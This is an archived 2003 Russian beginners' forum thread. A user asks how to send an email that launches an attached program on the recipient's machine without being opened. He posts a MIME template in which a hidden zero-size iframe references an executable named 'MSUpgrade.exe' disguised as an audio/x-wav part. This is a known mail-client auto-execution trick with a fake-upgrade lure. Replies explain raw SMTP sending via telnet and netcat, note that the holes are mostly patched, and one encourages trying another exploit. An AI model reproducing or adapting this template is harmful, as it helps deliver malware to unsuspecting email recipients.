Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Господа, будьте снисходительны, не бросайтесь сразу штрафовать за, как вам кажется, глупые вопросы - beginners на то и beginners.
| | | | | |
Если речь об автоматическом запуске бинарника при показе письма, то 03.09.03 11:05 Число просмотров: 1116
Автор: v15 Статус: Незарегистрированный пользователь
|
> > > Эти дырки позакрывали уже давно. В пятом OE
> > прокатит...
> >
> > Я не понял. Это невозможно в принципе?
> Эти дырки если не все, то очень многие, действительно
> позакрывали. Единственный шанс - нарваться на
> непропатченного почтового клиента. Но поскольку времени с
> тех пор, как за запусками непрошеного кода стали следить,
> прошло уже довольно много, то и это шанс невеликий.
А что ты думаешь про експлойт 2DimensionOfExploitsEnc?
Может с этой стороны?
|
|
<beginners>
|
Пересылка мыла без изменения служебной части (чем?) 31.08.03 18:48
Автор: v15 Статус: Незарегистрированный пользователь
|
|
Как переслать мыло, чтобы не менялась служебная часть. Слышал о прог-ге под названием Zender. Может кто-то подскажет по этому поводу!
|
|
The bat-ом 01.09.03 10:16
Автор: amirul <Serge> Статус: The Elderman
|
> Как переслать мыло, чтобы не менялась служебная часть.
> Слышал о прог-ге под названием Zender. Может кто-то
> подскажет по этому поводу!
Скажи точнее что тебе надо. Тебе одно письмо или автоматизированно, на SMTP серваке или уже после получения и т.д.
|
| |
The bat-ом 01.09.03 13:28
Автор: v15 Статус: Незарегистрированный пользователь
|
> > Как переслать мыло, чтобы не менялась служебная часть.
> > Слышал о прог-ге под названием Zender. Может кто-то
> > подскажет по этому поводу!
> Скажи точнее что тебе надо. Тебе одно письмо или
> автоматизированно, на SMTP серваке или уже после получения
> и т.д.
Надо, чтобы при доставке почты клиентом (без открытия) запускалась вложенная в тело письма прог-а. Например:
From: <vr_conv@rambler.ru>
To: <vr_con@rambler.ru>
Subject: !!!!!Test
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="MSUpgrade.exe"
Content-Transfer-Encoding: base64
Здесь, собственно, тело письма - бинарник прог-и которая должна стартовать.
--Служебная концовка
|
| | |
telnet-ом 01.09.03 13:38
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 01.09.03 13:52 Количество правок: 1
|
> > > Как переслать мыло, чтобы не менялась служебная
> часть.
> > > Слышал о прог-ге под названием Zender. Может
> кто-то
> > > подскажет по этому поводу!
> > Скажи точнее что тебе надо. Тебе одно письмо или
> > автоматизированно, на SMTP серваке или уже после
> получения
> > и т.д.
запускаешь telnet
open <адрес сервака куда шлешь> 25
HELO <имя>
MAIL From: <me@me.com>
RCPT To: <мыло на которое шлешь>
DATA
<мессага>
.
QUIT
где:
<адрес сервака куда шлешь> - определяется следующим образом:
nslookup -type=MX <часть мыла после собаки>
<мессага> - это твоя мессага...
> Надо, чтобы при доставке почты клиентом (без открытия)
> запускалась вложенная в тело письма прог-а.
Эти дырки позакрывали уже давно. В пятом OE прокатит...
|
| | | |
Это невозможно вообще??? 02.09.03 17:55
Автор: v15 Статус: Незарегистрированный пользователь
|
>
> Эти дырки позакрывали уже давно. В пятом OE прокатит...
Я не понял. Это невозможно в принципе?
|
| | | | |
Если речь об автоматическом запуске бинарника при показе письма, то 02.09.03 18:09
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
> > Эти дырки позакрывали уже давно. В пятом OE
> прокатит...
>
> Я не понял. Это невозможно в принципе?
Эти дырки если не все, то очень многие, действительно позакрывали. Единственный шанс - нарваться на непропатченного почтового клиента. Но поскольку времени с тех пор, как за запусками непрошеного кода стали следить, прошло уже довольно много, то и это шанс невеликий.
|
| | | | | |
Если речь об автоматическом запуске бинарника при показе письма, то 03.09.03 11:05
Автор: v15 Статус: Незарегистрированный пользователь
|
> > > Эти дырки позакрывали уже давно. В пятом OE
> > прокатит...
> >
> > Я не понял. Это невозможно в принципе?
> Эти дырки если не все, то очень многие, действительно
> позакрывали. Единственный шанс - нарваться на
> непропатченного почтового клиента. Но поскольку времени с
> тех пор, как за запусками непрошеного кода стали следить,
> прошло уже довольно много, то и это шанс невеликий.
А что ты думаешь про експлойт 2DimensionOfExploitsEnc?
Может с этой стороны?
|
| | | | | | |
Попробуй! Сообщи о результатах 03.09.03 11:27
Автор: whiletrue <Роман> Статус: Elderman
|
> А что ты думаешь про експлойт 2DimensionOfExploitsEnc?
> Может с этой стороны?
Прикольная уязвимость! Только она, кажись, не прокатит, если чел за прокси сидит.
|
| | | |
Мне больше netcat нравится 01.09.03 15:26
Автор: amirul <Serge> Статус: The Elderman
|
> open <адрес сервака куда шлешь> 25
Просто там не надо все это руками набивать.
> HELO <имя>
> MAIL From: <me@me.com>
> RCPT To: <мыло на которое шлешь>
> DATA
> <мессага>
> .
> QUIT
Надо засунуть все это в файл, например mail.txt и сделать
nc <mail.txt server_address.domain 25
> где:
> <адрес сервака куда шлешь> - определяется следующим
> образом:
> nslookup -type=MX <часть мыла после собаки>
>
> <мессага> - это твоя мессага...
>
> > Надо, чтобы при доставке почты клиентом (без открытия)
> > запускалась вложенная в тело письма прог-а.
>
> Эти дырки позакрывали уже давно. В пятом OE прокатит...
|
| | | | |
Telnet'ом и nc'ом 01.09.03 18:07
Автор: v15 Статус: Незарегистрированный пользователь
|
>
> > open <адрес сервака куда шлешь> 25
>
Спасибо, сейчас попробую.
|
|
|
подробно о проекте
Анализ криптографических сетевых...
